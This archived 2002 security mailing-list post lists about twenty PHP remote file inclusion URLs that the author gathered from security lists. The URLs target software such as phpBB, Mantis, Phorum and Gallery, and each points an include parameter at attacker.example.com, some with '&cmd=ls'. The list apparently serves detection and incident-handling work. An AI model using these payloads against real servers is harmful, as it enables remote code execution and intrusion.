I used the regular expression in my previous post to grab some concrete PHP-related URL's from about 4 months' worth of email, which includes various security mailing lists. Many of these URL's come from a Bugtraq post by Frog Man in June. /_head.php?_zb_path=http://attacker.example.com /achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attacker.example.com? /gallery/captionator.php?GALLERY_BASEDIR=http://attacker.example.com /globals.php3?LangCookie=http://attacker.example.com /include/msql.php?inc_dir=http://attacker.example.com&ext=txt /include/mssql7.php?inc_dir=http://attacker.example.com&ext=txt /include/mysql.php?inc_dir=http://attacker.example.com&ext=txt /include/oci8.php?inc_dir=http://attacker.example.com&ext=txt /include/postgres.php?inc_dir=http://attacker.example.com&ext=txt /include/postgres65.php?inc_dir=http://attacker.example.com&ext=txt /install.php?phpbb_root_dir=http://attacker.example.com /mantis/login_page.php?g_meta_include_file=http://attacker.example.com /page.php?template=http://your-ip/hello.html? /phorum/admin/actions/del.php?include_path=http://attacker.example.com&cmd=ls /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://attacker.example.com&cmd=ls /pollensondage.inc.php?app_path=http://attacker.example.com /user/agora_user.php?inc_dir=http://attacker.example.com&ext=txt /user/ldap_example.php?inc_dir=http://attacker.example.com&ext=txt /userlist.php?ME=http://attacker.example.com - Steve ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Sep 22 2002 - 16:01:32 PDT